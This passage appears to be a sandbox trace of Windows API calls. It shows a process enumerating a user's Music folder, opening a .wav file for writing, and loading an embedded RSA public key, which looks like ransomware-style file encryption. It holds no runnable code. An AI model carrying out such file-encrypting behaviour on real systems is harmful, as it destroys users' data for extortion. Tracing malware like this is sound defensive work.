RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.477] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\") returned="j ucK2lALp_iPp\\" [0195.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1eb8 [0195.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.477] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0195.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1eb8 | out: hHeap=0x2c0000) returned 1 [0195.478] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.478] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.478] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.478] PathFindFileNameW (pszPath="") returned="" [0195.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.479] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\*" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0195.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.480] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.480] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a2eabf0, ftCreationTime.dwHighDateTime=0x1d89f39, ftLastAccessTime.dwLowDateTime=0xb37640c0, ftLastAccessTime.dwHighDateTime=0x1d8a140, ftLastWriteTime.dwLowDateTime=0xb37640c0, ftLastWriteTime.dwHighDateTime=0x1d8a140, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="47m5sv0uqVNl", cAlternateFileName="47M5SV~1")) returned 1 [0195.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0195.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ae8eb8 [0195.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0195.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.481] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed82d140, ftCreationTime.dwHighDateTime=0x1d89e2d, ftLastAccessTime.dwLowDateTime=0xf2024cb0, ftLastAccessTime.dwHighDateTime=0x1d8a4c1, ftLastWriteTime.dwLowDateTime=0xf2024cb0, ftLastWriteTime.dwHighDateTime=0x1d8a4c1, nFileSizeHigh=0x0, nFileSizeLow=0xc124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dIbGo7.wav", cAlternateFileName="")) returned 1 [0195.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.482] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\dIbGo7.wav") returned=".wav" [0195.482] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\dIbGo7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\dibgo7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.484] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=49444) returned 1 [0195.485] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.487] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc0fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.488] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.490] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.490] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xc124, lpOverlapped=0x0) returned 1 [0195.491] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.491] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.491] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.491] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.492] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.493] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.493] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.493] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.493] GetLastError () returned 0x0 [0195.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.493] GetLastError () returned 0x0 [0195.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.493] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.493] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.494] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.494] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.494] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc120) returned 0x2af5168 [0195.495] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1eb8 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f00 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.496] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, 